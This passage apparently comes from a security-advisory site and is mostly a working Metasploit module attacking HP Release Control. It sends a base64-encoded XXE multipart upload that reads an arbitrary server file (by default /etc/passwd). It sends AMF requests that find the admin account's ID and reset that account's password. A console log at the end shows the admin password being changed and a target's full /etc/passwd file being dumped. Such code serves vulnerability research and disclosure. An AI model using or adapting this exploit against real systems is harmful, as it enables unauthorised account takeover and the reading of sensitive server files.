5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+T1VUQ09NRV9PVkVSX1RJTUVfREFUQV9TT1VSQ0U8L2lkPjxuYW1lPk91dGNvbWUgT3ZlciBUaW1lPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5GaWx0ZXI8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5GaWx0ZXI6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWUvPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0Pkdyb3VwIEJ5OjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlt3ZWVrXVtXZWVrXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48L0J1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48Y2hhcnRUaXRsZT5PdXRjb21lIE92ZXIgVGltZTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+Q29sb3I8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPlRvb2x0aXA8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+UGVyY2VudGFnZTwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+UGVyY2VudGFnZTwveUF4aXNMYWJlbD48c2VyaWVzU291cmNlPk91dGNvbWU8L3Nlcmllc1NvdXJjZT48c2VyaWVzTGFiZWw+T3V0Y29tZTwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+T3V0Y29tZSBPdmVyIFRpbWU8L25hbWU+PHV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjwvRXhwb3J0TGlzdD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVwbGFjZVBvcnRsZXREZWZzIg0KDQpZDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NjI3MDc2NjcxNDgyNDUyMDYwNDY2NDk5OTI2DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii5yZXBsYWNlTW9kdWxlcyINCg0KWQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIudHJpYWwiDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVuYW1lU3VmZml4Ig0KDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYtLQ==") data = data.sub('/etc/passwd', datastore['FILEPATH']) res = send_request_cgi({ 'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'), 'method' => 'POST', 'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926', 'cookie' => cookie, 'data' => data.to_s }) select(nil, nil, nil, 5) post = { 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y', '.exportPortletDefsLabel' => '', '.exportPortletDefsHidden' => '', '.exportModulesLabel' => 'Release Control Default Module', '.exportModulesHidden' => '[98304][Release Control Default Module]' } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'), 'method' => 'POST', 'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D', 'cookie' => cookie }) doc = REXML::Document.new res.body file = '' doc.elements.each('/ExportList/Module/description') do |element| file = element.text end print file end def change_admin_password(cookie, admin_id) req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=") password = Rex::Text::rand_text_alpha(8) req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'), 'method' => 'POST', 'ctype' => 'application/x-amf', 'data' => req, 'cookie' => cookie }) return password end def get_admin_id(cookie) req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'), 'method' => 'POST', 'ctype' => 'application/x-amf', 'data' => req, 'cookie' => cookie }) begin idx = res.body.index("admin admin") idx = idx + "admin admin".length + 25 + 1 + 1 id = res.body[idx+1..idx+6] return id rescue return nil end end end __END__ msf auxiliary(hp_release_control_xxe) > show options Module options (auxiliary/gather/hp_release_control_xxe): Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/passwd yes The filepath to read on the server PASSWORD passw0rd yes The password to authenticate with Proxies http:192.168.1.45:8080 no Use a proxy chain RHOST 192.168.1.109 yes The target address RPORT 8080 yes The target port TARGETURI / yes Base directory path USERNAME username yes The username to authenticate with VHOST no HTTP server virtual host msf auxiliary(hp_release_control_xxe) > run [*] Authenticating [*] Found admin id: 229376 [*] Changing admin's password... [*] Changed admin password to: ZaDdExMx [-] Auxiliary failed: RuntimeError Login failed: [-] Call stack: [-] /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with' [-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run' [*] Auxiliary module execution completed msf auxiliary(hp_release_control_xxe) > run [*] Authenticating [*] Found admin id: 229376 [*] Changing admin's password... [*] Changed admin password to: upvsoveu [*] Exploiting XXE... root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin release-control:x:500:500::/opt/HP/rc:/bin/bash rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin fdsa:x:501:501::/home/fdsa:/bin/bash [*] Auxiliary module execution completed msf auxiliary(hp_release_control_xxe) >


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top